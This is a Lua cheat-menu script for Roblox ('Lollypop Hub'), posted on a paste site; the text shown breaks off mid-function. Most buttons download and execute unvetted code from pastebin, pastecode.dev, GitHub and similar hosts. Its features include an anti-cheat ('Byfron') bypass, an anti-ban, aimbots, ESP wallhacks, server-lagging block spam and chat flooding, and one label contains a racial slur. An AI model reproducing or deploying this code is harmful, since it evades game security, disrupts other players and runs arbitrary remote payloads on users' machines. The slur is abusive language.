R

testlollypop

public
rrixh Mar 31, 2024 Never 207
Clone
Plaintext testLollypophub.jpg 3975 lines (3235 loc) | 163.17 KB
1
-- Mak LOLLYPOPHUB
2
-- Version: 8.5
3
-- Instanxes:
4
5
--loadstring(gameLoaded:true)--
6
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
7
Library.DefaultColor = Color3.fromRGB(50,205,50)
8
9
Library:Notification({
10
Text = "๐Ÿญ Welkome to Lollypop Hub, " ..game.Players.LocalPlayer.Name.. "๐Ÿญ",
11
Duration = 8
12
})--needme
13
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
14
Library.DefaultColor = Color3.fromRGB(50,205,50)
15
16
Library:Notification({
17
Text = "LOLLYPOP HUB V8.5๐Ÿญ๐Ÿ˜‹",
18
Duration = 7
19
})
20
21
local Library = loadstring(game:HttpGet("https://pastecode.dev/raw/MsVeci5gQG/kavomobileUi",true))()
22
23
24
local colors = {
25
SchemeColor = Color3.fromRGB(0,255,255),
26
Background = Color3.fromRGB(0, 0, 0),
27
Header = Color3.fromRGB(0, 0, 0),
28
TextColor = Color3.fromRGB(255,255,255),
29
ElementColor = Color3.fromRGB(20, 20, 20)
30
}
31
32
33
local title = "Lollypop Hub๐Ÿญ | V8.5 |", "Serpent", " Playing: " .. game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name .. ""
34
35
local Window = Library.CreateLib(title, colors)
36
37
38
---//yum lollypop hub\\--
39
-- LightTheme
40
-- DarkTheme
41
-- GrapeTheme
42
-- BloodTheme
43
-- Ocean
44
-- Midnight
45
-- Sentinel
46
-- Synapse
47
-- Serpent(new)
48
--tools1134,skripts35,game1443,games2450
49
50
51
local Skripts = Window:NewTab("Skripts")
52
local Visuals = Window:NewTab("Visuals")
53
local Info = Window:NewTab("Server Info")
54
local Settingsui = Window:NewTab("Ui Settings")
55
local Players = game:GetService("Players")
56
local RunService = game:GetService("RunService")
57
local plr = Players.LocalPlayer
58
59
local count = #game.Players:GetPlayers()
60
local Section = Info:NewSection("Serverinfo")
61
local label = Section:NewLabel("Players in the server: ".. count)
62
63
local Section = Settingsui:NewSection("UI Settings")
64
65
Section:NewColorPicker("Background color", "", Color3.fromRGB(255,255,255), function(color)
66
colors.Background = color
67
end)
68
69
Section:NewColorPicker("Scheme color", "", Color3.fromRGB(255,255,255), function(color)
70
colors.SchemeColor = color
71
end)
72
73
Section:NewColorPicker("Header color", "", Color3.fromRGB(255,255,255), function(color)
74
colors.Header = color
75
end
76
)
77
78
79
Section:NewColorPicker("Text color", "", Color3.fromRGB(255,255,255), function(color)
80
colors.TextColor = color
81
end
82
)
83
84
Section:NewColorPicker("Element color", "", Color3.fromRGB(255,255,255), function(color)
85
colors.ElementColor = color
86
end
87
)
88
89
local Section = Visuals:NewSection("ESP")
90
91
local RunService = game:GetService("RunService")
92
93
getgenv().Enabled = false
94
getgenv().Color = Color3.fromRGB(255,255,255)
95
96
function enablestuff()
97
for i,v in pairs(Players:GetPlayers()) do
98
if v~= plr and v.Character then
99
if not v.Character:FindFirstChild('ESP') then
100
local highlight = Instance.new('Highlight')
101
highlight.Name = 'ESP'
102
highlight.Parent = v.Character
103
highlight.Enabled = getgenv().Enabled
104
highlight.FillColor = getgenv().Color
105
highlight.OutlineColor = getgenv().Color
106
else
107
local highlight = v.Character:FindFirstChild('ESP')
108
highlight.Enabled = getgenv().Enabled
109
highlight.FillColor = getgenv().Color
110
highlight.OutlineColor = getgenv().Color
111
end
112
end
113
end
114
end
115
116
Players.ChildAdded:connect(function()
117
local count = #game.Players:GetPlayers()
118
label:UpdateLabel("Players in the server: ".. count)
119
end)
120
121
Players.ChildRemoved:connect(function(child)
122
local count = #game.Players:GetPlayers()
123
label:UpdateLabel("Players in the server: ".. count)
124
end)
125
126
127
Section:NewToggle("ESP toggle", "", function(state)
128
getgenv().Enabled = state
129
end)
130
131
Section:NewColorPicker("ESP color", "", Color3.fromRGB(255,255,255), function(color)
132
getgenv().Color = color
133
end)
134
135
136
RunService.RenderStepped:connect(function()
137
enablestuff()
138
end)
139
140
141
local SkriptsSection = Skripts:NewSection("Skript hub by lulaslollipop๐Ÿญ๐Ÿ˜‹")
142
143
SkriptsSection:NewButton("(ANTI-BYFRON)\n๐ŸšจMUST USE AFTER SKRIPT LOADS๐Ÿšจ", "anti byfron kause they tryna troll us lmao", function()
144
loadstring(game:HttpGet("https://pastecode.dev/raw/gr7xm8i3/LollypopAdmin-fuxkbyfron2-destroy.lua",true))()
145
end)
146
147
SkriptsSection:NewButton("๐ŸญLollypop Admin๐Ÿญ (nameless remake)", "type the kommand in the kommand bar", function()
148
--lollypopadmin,fukbyfron&NAdevs
149
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/LollypopAdmin-skiddedbylulas/main/nobyfron.main",true))()
150
end)
151
152
SkriptsSection:NewButton("[๐ŸฅšTHE HUNT: First Edition๐Ÿฅš]\n(60+ GAMES SUPPORT)!!!", "did not add games that ban or dont allow exploits", function()
153
--THE HUNT SKRIPTLOADER(60+GAME SUPPORT)
154
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/THEHUNT-skriptloader/main/60plusGames_lulaslollipop",true))()
155
--[made by lulaslollipop๐Ÿญ]--
156
end)
157
158
SkriptsSection:NewDropdown("Last Updated: Mar 28, 2024 [THE HUNT!๐Ÿฅš IS\n ALMOST OVER!!!!(2d)]:","updates and add-ons to the skript will be here", {"Version: 8.4", "updates:", "-added V3rge Bypasser(Fun)", "๐ŸšจMAKE SURE U EXEKUTE ANTI-BYFRON๐Ÿšจ", "xhelulu,HG๐Ÿ’š๐Ÿญ๐Ÿœ"}, function(currentOption)
159
print(currentOption)
160
end)
161
162
163
--[LABELS]--
164
SkriptsSection:NewLabel("๐Ÿญ Welkome to Lollypop Hub, " ..game.Players.LocalPlayer.Name.. "!")
165
166
SkriptsSection:NewLabel("UID: " ..game.Players.LocalPlayer.UserId.. " | Akkount Age: " ..game.Players.LocalPlayer.AccountAge.. " day(s)")
167
168
SkriptsSection:NewLabel("Game Name: "..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name.."")
169
170
SkriptsSection:NewLabel("Game ID: "..game.PlaceId.."")
171
172
SkriptsSection:NewLabel("This Nigga Is Using: " ..identifyexecutor().."")
173
174
-- SkriptsSection:NewLabel("Akkount Age: " ..game:GetService("Players").LocalPlayer.AccountAge.." day(s)")
175
--[LABELS done]--
176
177
178
-- SKRIPTS BUTTONS
179
SkriptsSection:NewButton("99% fail impossible obby", "purple = โœ…, red = โŒ, green = โœ…, tile broke, or ๐Ÿ”ฅ ", function()
180
-- lulas 99 fail memory skript
181
loadstring(game:HttpGet(('https://pastebin.com/raw/DhLMep63'),true))()
182
end)
183
184
SkriptsSection:NewButton("Heaven Map (99% fail)", "reduxes lag too", function()
185
loadstring(game:HttpGet("https://pastebin.com/raw/RW7ZT29m"))()
186
end)
187
188
SkriptsSection:NewButton("ANTI-BAN (fixed &workingโœ…)", "anti-ban skript/antilogger", function()
189
--just anti logger (safexhat)
190
loadstring(game:HttpGet("https://pastecode.dev/raw/tarixx9o/lulas-antiban.jar",true))()
191
end)
192
193
194
-- SkriptsSection:NewButton("Vietnam notifier๐Ÿšจ๐Ÿ“ข", "will send u a notif if viet joins", function()
195
-- -- be notified wen viet joins
196
-- loadstring(game:HttpGet("https://pastebin.com/raw/C96cg2xG"))()
197
-- end)
198
199
-- SkriptsSection:NewButton("Kokushibo notifier๐Ÿšจ๐Ÿ“ข", "will notify u if kokushibo joins",
200
-- function()-- kokushibo notifier
201
-- loadstring(game:HttpGet("https://pastebin.com/raw/1hnL2uEj"))()
202
-- end)
203
204
205
206
207
SkriptsSection:NewButton("ANTI-AFK", "no afk",
208
function()local vu = game:GetService("VirtualUser")
209
game:GetService("Players").LocalPlayer.Idled:connect(function()
210
vu:Button2Down(Vector2.new(0,0),workspace.CurrentCamera.CFrame)
211
wait(1)
212
vu:Button2Up(Vector2.new(0,0),workspace.CurrentCamera.CFrame)
213
end)
214
--end anti afk
215
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
216
Library.DefaultColor = Color3.fromRGB(50,205,50)
217
218
Library:Notification({
219
Text = "now they kant stop u frm sleeping๐Ÿ˜ด",
220
Duration = 5.5
221
})
222
end)
223
224
SkriptsSection:NewButton("ANTI-AFK 2", "if 1 dont work",
225
function()
226
--anti afk
227
for i,v in pairs(getconnections(game:GetService("Players").LocalPlayer.Idled)) do
228
v:Disable()
229
end
230
231
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
232
Library.DefaultColor = Color3.fromRGB(50,205,50)
233
234
Library:Notification({
235
Text = "anti afk enabled๐Ÿญ",
236
Duration = 5
237
})
238
end)
239
240
local SkriptsSection = Skripts:NewSection("Skripts")
241
242
-- SkriptsSection:NewToggle("godmode toggle test", "test", function(state)
243
-- if state then
244
-- local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
245
-- Library.DefaultColor = Color3.fromRGB(50,205,50)
246
247
-- Library:Notification({
248
-- Text = "godmode onโœ…",
249
-- Duration = 2.5
250
-- })
251
-- -- Z to Toggle
252
-- local player = game:GetService("Players").LocalPlayer
253
-- local UIS = game:GetService("UserInputService")
254
-- local lollypop = false
255
256
-- UIS.InputBegan:Connect(function(input, GPE)
257
-- if GPE then return end
258
-- if input.KeyCode == Enum.KeyCode.Z then
259
-- lollypop = not lollypop
260
-- end
261
-- end)
262
263
-- while task.wait() do
264
-- local parts = workspace:GetPartBoundsInRadius(player.Character:WaitForChild("HumanoidRootPart").Position, 10)
265
-- for _, part in ipairs(parts) do
266
-- part.CanTouch = lollypop
267
-- end
268
-- end
269
-- else
270
-- lollypop = not lollypop
271
272
-- local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/Revenant", true))()
273
-- Library.DefaultColor = Color3.fromRGB(50,205,50)
274
275
-- Library:Notification({
276
-- Text = "godmode offโŒ",
277
-- Duration = 2.5
278
-- })
279
-- end
280
-- end)
281
282
-- toggle anti sit
283
SkriptsSection:NewToggle("Anti-Sit", "kinda good but i prefer using godmode", function(state)
284
if state then
285
local RunService = game:GetService("RunService")
286
function antiSit()
287
if game.Players.LocalPlayer.Character.Humanoid:GetState() == Enum.HumanoidStateType.Seated then
288
game.Players.LocalPlayer.Character.Humanoid.Sit = false
289
end
290
end
291
RunService:BindToRenderStep("tempBinding", 1000, antiSit)
292
293
game:GetService("StarterGui"):SetCore("SendNotification",{
294
Title = "Anti-Sitโœ…",
295
Text = "on",
296
297
Duration = 3
298
})
299
else
300
local RunService = game:GetService("RunService")
301
function antiSit()
302
if game.Players.LocalPlayer.Character.Humanoid:GetState() == Enum.HumanoidStateType.Seated then
303
game.Players.LocalPlayer.Character.Humanoid.Sit = true
304
end
305
end
306
RunService:BindToRenderStep("tempBinding", 1000, antiSit)
307
308
game:GetService("StarterGui"):SetCore("SendNotification",{
309
Title = "Anti-SitโŒ",
310
Text = "off",
311
312
Duration = 3
313
})
314
end
315
end)
316
--end toggle antisit
317
SkriptsSection:NewButton("Anti-Fall (universal)", "it will tp u to the previous area before u fell",
318
function()
319
-- anti fall
320
loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/AntiFall/main/Script"))()
321
wait(0.1)
322
loadstring(game:HttpGet("https://pastecode.dev/raw/nZaPtHFa5p/lollypop5ever_lulaslollipop",true))()
323
end)
324
325
--end:"ANTI"()
326
327
--infjump.Konnekt
328
SkriptsSection:NewToggle("Infinite jump", "no jump limit", function(toggled)
329
if toggled then
330
getgenv().InfJump = true
331
spawn(function()
332
while getgenv().InfJump == true do
333
game:GetService("UserInputService").JumpRequest:connect(function()
334
if getgenv().InfJump == true then
335
game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping")
336
end
337
end)
338
wait()
339
end
340
end)
341
else
342
getgenv().InfJump = false
343
end
344
end)
345
--infjump.Diskonnekt
346
347
-- SkriptsSection:NewToggle("Infinite jump 2", "use if original doesnt work", function(state)
348
-- if state then
349
-- local InfiniteJumpEnabled = true
350
-- game:GetService("UserInputService").JumpRequest:connect(function()
351
-- if InfiniteJumpEnabled then
352
-- game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping")
353
-- end
354
-- end)
355
-- else
356
-- InfiniteJumpEnabled = false
357
-- end
358
-- end)
359
360
-- SkriptsSection:NewToggle("Auto Jump", "auto jumps", function()
361
-- local jump = game.Players.LocalPlayer.Character.Humanoid.Jump
362
-- wait()
363
-- jump = true
364
-- end
365
-- else
366
-- jump = false
367
-- end)fuxking stupid ass autojump
368
369
SkriptsSection:NewButton("Aimbot(R6 only)", "simple aimbot skript by me", function()
370
loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-AIMBOT-SKRIPT-6783"))()
371
end)
372
373
SkriptsSection:NewButton("Aimbot 2 (say /console)", "aimbot", function()
374
375
-- aimbot print
376
loadstring(game:HttpGet("https://pastebin.com/raw/i9QLTtbD"))()
377
end)
378
379
-- superhuman
380
SkriptsSection:NewToggle("Super-Human", "boosts jumppower and speed", function(state)
381
if state then
382
game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 120
383
game.Players.LocalPlayer.Character.Humanoid.JumpPower = 120
384
else
385
game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
386
game.Players.LocalPlayer.Character.Humanoid.JumpPower = 50
387
end
388
end)
389
390
SkriptsSection:NewToggle("Sit", "sit/unsit", function(state)
391
if state then
392
-- sitTrue
393
game.Players.LocalPlayer.Character.Humanoid.Sit = true
394
else
395
-- sitFalse
396
game.Players.LocalPlayer.Character.Humanoid.Sit = false
397
end
398
end)
399
400
SkriptsSection:NewButton("what does this do?", "???",
401
function()
402
--???--
403
loadstring(game:HttpGet("https://pastebin.com/raw/DQ1a5ggY",true))()
404
end)
405
406
SkriptsSection:NewButton("Show chatBox (for games without it)", "good for games like evade w no msg box",
407
function()
408
game:GetService("StarterGui"):SetCoreGuiEnabled('Chat', true)
409
end)
410
411
SkriptsSection:NewButton("Shy Animation (99% fail)", "for 99% fail impossible obby",
412
function()local ohInstance1 = game.Players.LocalPlayer.Character.Humanoid
413
414
game:GetService("ReplicatedStorage").OnRagdoll:FireServer(ohInstance1)
415
416
loadstring(game:HttpGet("https://pastecode.dev/raw/nZaPtHFa5p/lollypop5ever_lulaslollipop",true))()
417
end)
418
419
SkriptsSection:NewButton("EXEKUTE SKRIPT FROM MESSAGES", "exekute a skript frm msg box",
420
function()loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/chat-executor/main/chat-executor",true))()
421
end)
422
423
SkriptsSection:NewButton("Kredits", "ty to me๐Ÿ˜๐Ÿญ", function()
424
-- kredits to lulas
425
game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("LULASLOLLIPOP THE BEST๐Ÿญ๐Ÿ’“๐Ÿญ๐Ÿ’“","All")
426
end)
427
428
SkriptsSection:NewButton("less lag", "FX remover", function()
429
for _, v in pairs(game:GetService("Workspace"):GetDescendants()) do
430
if v:IsA("BasePart") and not v.Parent:FindFirstChild("Humanoid") then
431
v.Material = Enum.Material.SmoothPlastic
432
if v:IsA("Texture") then
433
v:Destroy()
434
end
435
end
436
end
437
438
loadstring(game:HttpGet("https://pastecode.dev/raw/nZaPtHFa5p/lollypop5ever_lulaslollipop",true))()
439
end)
440
441
SkriptsSection:NewButton("less lag 2 (might dim brightness)", "less rendering", function()
442
loadstring(game:HttpGet("https://pastebin.com/raw/nHKkMHpN",true))()
443
end)
444
445
SkriptsSection:NewButton("WALKSPEED GUI", "+ -", function()
446
loadstring(game:HttpGet("https://pastebin.com/raw/2gGvc9ya"))()
447
end)
448
449
SkriptsSection:NewButton("Mood Switxher (yellow/gray)", "yellow grey", function()
450
loadstring(game:HttpGet('https://pastebin.com/raw/djAd7g2W'))()
451
end)
452
453
SkriptsSection:NewButton("R6 Klimb on walls", "klimb on any walls", function()
454
loadstring(game:HttpGet('https://pastebin.com/raw/jLVhHEVW'))()
455
456
loadstring(game:HttpGet("https://pastecode.dev/raw/nZaPtHFa5p/lollypop5ever_lulaslollipop",true))()
457
end)
458
459
SkriptsSection:NewButton("Drag & resize chat", "lets u kontrol the xhat drag and size it", function()
460
-- drag &resize xhat
461
loadstring(game:HttpGet("https://pastebin.com/raw/e3KhdyYS"))()
462
463
loadstring(game:HttpGet("https://pastecode.dev/raw/nZaPtHFa5p/lollypop5ever_lulaslollipop",true))()
464
end)
465
466
SkriptsSection:NewButton("walk on walls (R15 and R6)", "w.o.w", function()
467
-- walk on walls
468
loadstring(game:HttpGetAsync("https://pastebin.com/raw/RY9cBbdG"))()
469
loadstring(game:HttpGet("https://pastecode.dev/raw/nZaPtHFa5p/lollypop5ever_lulaslollipop",true))()
470
end)
471
SkriptsSection:NewLabel("Mobile Fly guis")
472
SkriptsSection:NewButton("Fly GUI V2", "mobile fly gui",
473
function()-- arkeus fly mobile
474
loadstring(game:HttpGet("https://pastebin.com/raw/Kq7cPe3C"))()
475
end)
476
SkriptsSection:NewButton("Fly GUI V3", "fly for mobile",
477
function()-- v3 fly
478
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/mobileflygui/main/v3_lulaslollipop",true))()
479
end)
480
SkriptsSection:NewButton("Mobile Fly GUI B&W", "modded",
481
function()--b&w fly gui mobile
482
loadstring(game:HttpGet("https://pastecode.dev/raw/hARYYPVGuq/moddedflygui_lulaslollipop",true))()
483
end)
484
SkriptsSection:NewButton("Mobile FLY HD ADMIN", "mobile fly HD ADMIN version",
485
function()-- FLY HD ADMIN
486
loadstring(game:HttpGet("https://raw.githubusercontent.com/TakeModzz/Ignore-00000/main/Ignore"))()
487
end)
488
SkriptsSection:NewButton("Mobile Universal Fly GUI", "speed setter",
489
function()loadstring(game:HttpGet("https://pastebin.com/raw/YvKv4AuY"))()
490
end)
491
492
--[godmode skripts]--
493
SkriptsSection:NewLabel("GodMode skripts")
494
SkriptsSection:NewButton("GodMode (99% fail impossible obby)", "no death 99% fail and some obbys",
495
function()
496
loadstring(game:HttpGet("https://pastebin.com/raw/RWLVhV4N",true))()
497
end)
498
499
SkriptsSection:NewButton("GodMode V2", "no death 99% fail and survive kill brixks",
500
function()-- fe brixk toggle
501
loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/ignore-touchinterests/main/main",true))()
502
end)
503
SkriptsSection:NewButton("Universal Godmode", "universal",
504
function()-- unvrsl godmode
505
loadstring(game:HttpGet("https://freenote.biz/raw/Fhpx5r5A8M"))()
506
end)
507
--[keybind gens]--
508
SkriptsSection:NewLabel("โŒจ๏ธKeybind GensโŒจ๏ธ")
509
SkriptsSection:NewButton("KEYBIND GENERATOR", "keyboard letters generator (useful)",
510
function()
511
loadstring(game:HttpGet(('https://pastefy.app/Ujm4HWxh/raw'),true))()
512
end)
513
SkriptsSection:NewButton("KEYBIND GENERATOR V2", "keyboard letters generator (useful)",
514
function()
515
-- keybind generator v2
516
loadstring(game:HttpGet("https://gist.githubusercontent.com/RedZenXYZ/4d80bfd70ee27000660e4bfa7509c667/raw/da903c570249ab3c0c1a74f3467260972c3d87e6/KeyBoard%2520From%2520Ohio%2520Fr%2520Fr"))()
517
end)
518
--others--
519
SkriptsSection:NewLabel("...")
520
SkriptsSection:NewButton("Mobile Shiftloxk", "shift loxk button",
521
function()--shiftloxk
522
loadstring(game:HttpGet("https://pastebin.com/raw/uqAS6EfN"))()
523
end)
524
525
SkriptsSection:NewButton("BETTER Teleport To Player GUI", "V2",
526
function()loadstring(game:HttpGet("https://gist.githubusercontent.com/DagerFild/b4776075a0d26ef04394133ee6bd2081/raw/0ed51ac94057d2d9a9f00e1b037b9011c76ca54a/tpGUI", true))()
527
end)
528
529
SkriptsSection:NewButton("Lag Switxh V2", "might inkrease FX too,๐Ÿ›œ",
530
function()loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/Protected - 2023-05-28T225112.055.lua.txt'),true))()
531
end)
532
533
SkriptsSection:NewButton("Translate Messages (fixed)", "type >(language)",
534
function()loadstring(game:HttpGet("https://pastebin.com/raw/8PRDbzXG"))()
535
end)
536
--[mobile keyboard]--
537
SkriptsSection:NewLabel("Mobile Keyboard")
538
SkriptsSection:NewButton("Mobile Keyboard", "its a mobile keyboard",
539
function()
540
loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt", true))()
541
end)
542
SkriptsSection:NewButton("Better Keyboard", "keyboard gui",
543
function()-- bettter keyboard
544
loadstring(game:HttpGet("https://pastebin.com/raw/X8keCiWA",true))()
545
end)
546
--[komputer things]--
547
SkriptsSection:NewLabel("Komputer")
548
SkriptsSection:NewButton("KEYBIND STROKES V2", "WASD and spaxe keys",
549
function()-- KEYSTROKES GUI V2
550
loadstring(game:HttpGet(('https://pastefy.app/Te4dwSw2/raw'),true))()
551
end)
552
553
--[[
554
{"Esc", "F1", "F2", "F3", "F4", "F5", "F6", "F7", "F8", "F9", "F10", "F11", "F12"},
555
{"~", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "-", "="},
556
{"Tab", "Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P", "[", "]"},
557
{"CapsLock", "A", "S", "D", "F", "G", "H", "J", "K", "L", ";", "'", "\\"},
558
{"Shift", "Z", "X", "C", "V", "B", "N", "M", ",", ".", "/"},
559
{"Ctrl", "Win", "Alt", "Space", "Alt", "Menu", "Ctrl"}
560
]]
561
SkriptsSection:NewButton("MOUSE KURSOR", "gives u a mouse kursor touxh",
562
function()
563
loadstring(game:HttpGet(('https://pastefy.app/58d8d52G/raw'),true))()
564
loadstring(game:HttpGet("https://pastecode.dev/raw/nZaPtHFa5p/lollypop5ever_lulaslollipop",true))()
565
end)
566
567
SkriptsSection:NewLabel("2016-17 roblox")
568
SkriptsSection:NewButton("fast animations", "player animation will be sped up",
569
function()-- FAST animations
570
loadstring(game:HttpGet("https://scriptblox.com/raw/Fast-Animation-FE_744"))()
571
end)
572
573
SkriptsSection:NewButton("old roblox animation", "r6 only",
574
function()loadstring(game:HttpGet("https://pastebin.com/raw/0ZPiK5ci"))()
575
end)
576
577
SkriptsSection:NewButton("Free R15 emotes", "new&old emotes 2017-23",
578
function()loadstring(game:HttpGet("https://pastebin.com/raw/eCpipCTH"))()
579
end)
580
581
SkriptsSection:NewButton("Better ROBLOX", "red roblox w stat info",
582
function()loadstring(game:HttpGet("https://eternityhub.xyz/BetterRoblox/Loader"))()
583
end)
584
585
SkriptsSection:NewButton("2016 roblox UI", "old ui",
586
function()loadstring(game:HttpGet('https://raw.githubusercontent.com/kosuke14/REBOYHub/main/games/2016_Roblox.lua'))()
587
end)
588
SkriptsSection:NewLabel("...")
589
SkriptsSection:NewButton("RAINBOW MAP", " ",
590
function()--RAINBOW MAP
591
while true do
592
for _, part in ipairs(workspace:GetDescendants()) do
593
if part:IsA("BasePart") then
594
local r = math.random()
595
local g = math.random()
596
local b = math.random()
597
part.BrickColor = BrickColor.new(Color3.new(r, g, b))
598
end
599
end
600
wait(0.5)
601
end
602
end)
603
604
SkriptsSection:NewButton("SAVE TELEPORT LOKATION", "stand where u want and push add",
605
function()loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/Tp%20Place%20GUI'),true))()
606
end)
607
608
SkriptsSection:NewButton("Spy ccTV Kamera", "spy",
609
function()loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/CCTV%20Camera'))()
610
end)
611
612
SkriptsSection:NewButton("TOGGLE INVISIBILITY", "prolly not FE",
613
function()-- toggle invisibility
614
loadstring(game:HttpGet("https://pastebin.com/raw/HrbT6bNK",true))()
615
end)
616
617
SkriptsSection:NewButton("Freeze POV Kamera", "pov freeze",
618
function()loadstring(game:HttpGet('https://pastebin.com/raw/T0S0RPTW'))()
619
end)
620
621
SkriptsSection:NewButton("OP SUPER SKREEN STRETXH", "better skreen",
622
function()local camera = workspace.CurrentCamera
623
local settings = {
624
["Aspect Ratio"] = true, --// leave it like this if i don't know what You're doing
625
["Ratio Value"] = 0.6 --// leave it like this if i don't know what You're doing
626
}
627
628
local oldNewindex
629
630
oldNewindex = hookmetamethod(game, "__newindex", function(object, propertyName, propertyValue)
631
if object == camera and propertyName == "CFrame" then
632
if settings["Aspect Ratio"] then
633
propertyValue = propertyValue * CFrame.new(0, 0, 0, 1, 0, 0, 0, settings["Ratio Value"], 0, 0, 0, 1)
634
end
635
end
636
return oldNewindex(object, propertyName, propertyValue)
637
end)
638
end)
639
640
SkriptsSection:NewButton("Never Ending Bloxk Spawner", "good for lagging servers",
641
function()local player = game.Players.LocalPlayer
642
local character = player.Character or player.CharacterAdded:Wait()
643
local part = Instance.new("Part")
644
part.BrickColor = BrickColor.new("Bright blue")
645
part.Size = Vector3.new(5, 5, 5)
646
647
while true do
648
local position = character.PrimaryPart.Position
649
local randomOffset = Vector3.new(math.random(-10, 10), math.random(-10, 10), math.random(-10, 10))
650
part:Clone().Parent = workspace
651
part.Position = position + randomOffset
652
wait(0.4) -- adjust the delay between spawns if u want
653
end
654
end)
655
656
SkriptsSection:NewButton("KLEAR MESSAGES TROLL", "prints a huge text msg",
657
function()
658
game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(" โธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธปโธป", "All")
659
end)
660
661
SkriptsSection:NewButton("Parkour Run", "no speed limit,FOV & speed",
662
function()-- fe parkour
663
loadstring(game:HttpGet("https://pastebin.com/raw/R5YR13pG"))()
664
end)
665
666
SkriptsSection:NewButton("R15 to R6", "only work if u are r15",
667
function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Imagnir/r6_anims_for_r15/main/r6_anims.lua", true))()
668
end)
669
670
SkriptsSection:NewButton("Noklip", "go thru walls",
671
function()loadstring(game:HttpGet("https://pastebin.com/raw/3wf2wpBW"))()
672
end)
673
674
SkriptsSection:NewButton("Spektate", "spektate players",
675
function()loadstring(game:HttpGet("https://pastebin.com/raw/daM0ut53"))()
676
end)
677
678
SkriptsSection:NewButton("GreenSkreengui", "not fe but perfekt for videos", function()
679
loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/Green%20Screen'))()
680
end)
681
682
local SkriptsSection = Skripts:NewSection("ESP")
683
684
SkriptsSection:NewButton("Minekraft ESP", "shows all usernames and esp",
685
function()-- ESP PIXELGAME
686
loadstring(game:HttpGet("https://paste.gg/p/anonymous/7259b0557ebf44ccabf2f7b58dc79899/files/0475cb5d744642a2b572e3a8af205588/raw"))()
687
end)
688
689
SkriptsSection:NewButton("Show Usernames ESP", "shows all usernames and esp",
690
function()loadstring(game:HttpGet("https://pastebin.com/raw/hpMC6ULU"))()
691
end)
692
693
SkriptsSection:NewButton("Shadow ESP", "see players thru walls but shadows",
694
function()loadstring(game:HttpGet("https://pastebin.com/raw/QQqiFGTE"))()
695
end)
696
697
SkriptsSection:NewButton("Purple ESP", "see players highlighted purple",
698
function()loadstring(game:HttpGet("https://pastebin.com/raw/7K1Jhmck"))()
699
end)
700
701
local SkriptsSection = Skripts:NewSection("Exekutors")
702
703
-- exekutors below label
704
SkriptsSection:NewButton("Arkeus X Exekutor", "android exekutor works for ios",
705
function()loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/chillz-workshop/main/Arceus%20X%20V3"))()
706
end)
707
SkriptsSection:NewButton("Fluxus Koral remake", "kredits Anya&me",
708
function()
709
--fluxus remake(kredits to Anya&๐Ÿญ)
710
loadstring(game:HttpGet("https://pastecode.dev/raw/DhToGLHKE9/fluxusExekutor_lulaslollipopAnya",true))()
711
end)
712
SkriptsSection:NewButton("KRNL Exekutor", "an exekutor",
713
function()loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/Chillz-s-scripts/main/KRNL%20UI%20Remake.lua"))()
714
end)
715
SkriptsSection:NewButton("Neptune Exekutor", "an exekutor",
716
function()-- neptune exe
717
loadstring(game:HttpGet('https://pastebin.com/raw/y3jhxS5r'))()
718
end)
719
SkriptsSection:NewButton("Rc7 exekutor(old)", "request by emil", function()
720
--[[
721
Rc7 exe gui old
722
]]
723
